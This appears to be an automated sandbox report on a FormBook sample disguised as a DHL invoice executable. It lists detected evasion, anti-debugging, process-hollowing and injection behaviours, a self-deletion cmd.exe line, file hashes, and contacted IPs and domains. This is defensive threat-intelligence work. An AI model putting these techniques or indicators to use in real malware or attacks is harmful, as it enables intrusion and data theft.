Source: C:\Windows\SysWOW64\cscript.exe TID: 2064	Thread sleep time: -2044000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 2064	Thread sleep count: 8948 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 2064	Thread sleep time: -17896000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\SysWOW64\cscript.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cscript.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012ADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_012ADBBE
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0127C2A2 FindFirstFileExW,	0_2_0127C2A2
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_012B698F
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B68EE FindFirstFileW,FindClose,	0_2_012B68EE
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012AD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_012AD076
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012AD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_012AD3A9
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_012B979D
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_012B9642
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_012B9B2B
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B5C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_012B5C97
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0035F0D3 GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,WideCharToMultiByte,GetLastError,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose,	4_2_0035F0D3

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_012442DE

Source: explorer.exe, 00000003.00000002.868529966.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
Source: explorer.exe, 00000003.00000002.869194618.0000000003E59000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000003.00000002.869194618.0000000003DDA000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000003.00000002.869194618.0000000003E59000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}eeab7790
Source: explorer.exe, 00000003.00000000.349305261.00000000025E0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0a
Source: explorer.exe, 00000003.00000002.869194618.0000000003E59000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}100\4&20

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00409AA0 rdtsc

2_2_00409AA0

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0040ACE0 LdrLoadDll,

2_2_0040ACE0

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012BEAA2 BlockInput,

0_2_012BEAA2

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_01272622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_01272622

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_012442DE

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01264CE8 mov eax, dword ptr fs:[00000030h]	0_2_01264CE8
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_001B3470 mov eax, dword ptr fs:[00000030h]	0_2_001B3470
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_001B34D0 mov eax, dword ptr fs:[00000030h]	0_2_001B34D0
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_001B1E70 mov eax, dword ptr fs:[00000030h]	0_2_001B1E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007200EA mov eax, dword ptr fs:[00000030h]	2_2_007200EA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00720080 mov ecx, dword ptr fs:[00000030h]	2_2_00720080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007426F8 mov eax, dword ptr fs:[00000030h]	2_2_007426F8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02080080 mov ecx, dword ptr fs:[00000030h]	4_2_02080080
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020800EA mov eax, dword ptr fs:[00000030h]	4_2_020800EA
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020A26F8 mov eax, dword ptr fs:[00000030h]	4_2_020A26F8

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

0_2_012A0B62

Enables debug privileges

Source: C:\Windows\SysWOW64\svchost.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012609D5 SetUnhandledExceptionFilter,	0_2_012609D5
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01272622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_01272622
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0126083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0126083F
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01260C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_01260C21
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_00351335 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00351335

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 192.185.209.182 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 65.21.196.90 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.00050591.xyz
Source: C:\Windows\explorer.exe	Network Connect: 84.32.84.32 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.thepowerofzeus.com
Source: C:\Windows\explorer.exe	Domain query: www.arthemis-168bet.site
Source: C:\Windows\explorer.exe	Domain query: www.kjsdhklssk73.xyz
Source: C:\Windows\explorer.exe	Domain query: www.alivioquantico.com
Source: C:\Windows\explorer.exe	Network Connect: 185.107.56.60 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.241.203.16 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.ilovetvs.com

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Windows\SysWOW64\cscript.exe	NtUnmapViewOfSection: Indirect: 0x5B9DB9	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	NtClose: Indirect: 0x5B9DC5
Source: C:\Windows\SysWOW64\cscript.exe	NtQueueApcThread: Indirect: 0x5BA531	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	NtMapViewOfSection: Indirect: 0x5B9D47	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	NtClose: Indirect: 0x38A56C
Source: C:\Windows\SysWOW64\svchost.exe	NtQueueApcThread: Indirect: 0x38A4F2	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\svchost.exe	Thread register set: target process: 1244			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Thread register set: target process: 1244			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\svchost.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\SysWOW64\svchost.exe

Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: 350000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008

Jump to behavior

Contains functionality to execute programs as a different user

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

0_2_012A1201

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_01282BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_01282BA5

Contains functionality to simulate keystroke presses

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012AB226 SendInput,keybd_event,

0_2_012AB226

Contains functionality to simulate mouse events

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012AE355 mouse_event,

0_2_012AE355

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"			Jump to behavior

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

0_2_012A0B62

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012A1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_012A1663

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: explorer.exe, 00000003.00000000.348892322.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868529966.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman-
Source: explorer.exe, 00000003.00000000.348991178.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.868662642.0000000000720000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, explorer.exe, 00000003.00000000.348991178.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.868662642.0000000000720000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.348991178.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.868662642.0000000000720000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: !Progman

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_01260698 cpuid

0_2_01260698

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\SysWOW64\cscript.exe	Code function: GetUserDefaultLCID,GetLocaleInfoA,LoadStringA,GetModuleFileNameA,LoadLibraryExA,LoadLibraryExA,LoadLibraryExA,lstrlenA,___swprintf_l,LoadLibraryExA,LoadLibraryExA,GetUserDefaultLCID,GetLocaleInfoA,___swprintf_l,LoadLibraryExA,LoadLibraryExA,		4_2_00353030
Source: C:\Windows\SysWOW64\cscript.exe	Code function: GetLocaleInfoW,wcsncmp,		4_2_003641BC

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_0127333F GetSystemTimeAsFileTime,

0_2_0127333F

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_0129D27A GetUserNameW,

0_2_0129D27A

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_0127B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_0127B952

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_012442DE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

OS version to string mapping found (often used in BOTs)

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Binary or memory string: WIN_81
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Binary or memory string: WIN_XP
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Binary or memory string: WIN_XPe
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Binary or memory string: WIN_VISTA
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Binary or memory string: WIN_7
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012C1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	0_2_012C1204
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012C1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_012C1806
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0036041E CreateBindCtx,SysAllocStringByteLen,SysFreeString,	4_2_0036041E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_00361AA2 CreateBindCtx,MkParseDisplayName,	4_2_00361AA2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_003566C1 CoCreateInstance,CoCreateInstance,CoCreateInstance,GetUserDefaultLCID,CoGetClassObject,CreateBindCtx,	4_2_003566C1

Windows Analysis Report
COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1482411
Product:	CloudBasic
Start time:	21:34:28
Start date:	25.07.2024
Sample:	COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
Cookbook:	default.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	5ec011058b0884bc3b13563f97231c58
SHA1:	9846a460d630ea60c476df6dc92ae10d902bb54f
SHA256:	bc5a7642799c2f22d513dc19fb87848ecbe002f1815b2d5fd3a5af3fdbcdf0ae
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Temp\acceptancy	ASCII text, with very long lines (28674), with no line terminators	03B2E53D6AC1CB80B6CA22E3F27BAD77	55183889EE2ED2CDED8AAF09EDE031BDFA3DF743	049BB98C864926C4AD93F47B4A172F96A77F70026E6D7C90C1F17D43570130B3
C:\Users\user\AppData\Local\Temp\aut6C1C.tmp	data	B6DD79F08F573262C501E40B76EB2157	A59648502834479E42E8DB955446E385A7D5D086	C6E161EA9598139F75E989DF320C5E39026DF7ACB2DA73B311A5955A64A8DC51
C:\Users\user\AppData\Local\Temp\aut6CC8.tmp	data	A2F0A1C5C448ECC19C5DFBE7F515CE55	6C2BFDADB9F1333A4A7BE1527AD61D2AEC161473	2C719F4B88D235F6156EAB0658F134D5301C061D36E945F1E5E111FB6AD204EB
C:\Users\user\AppData\Local\Temp\teer	data	3290F959A30536836BD7FCF7359C3C16	C846F7A300A172A577258CCE093E54F9072BC812	1C1DA36B87A6006CDD8751D486F3F50A423D3BC8356BE4112E19352DFAD5BCF1

Windows Analysis Report COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Malware Threat Intel
Provided by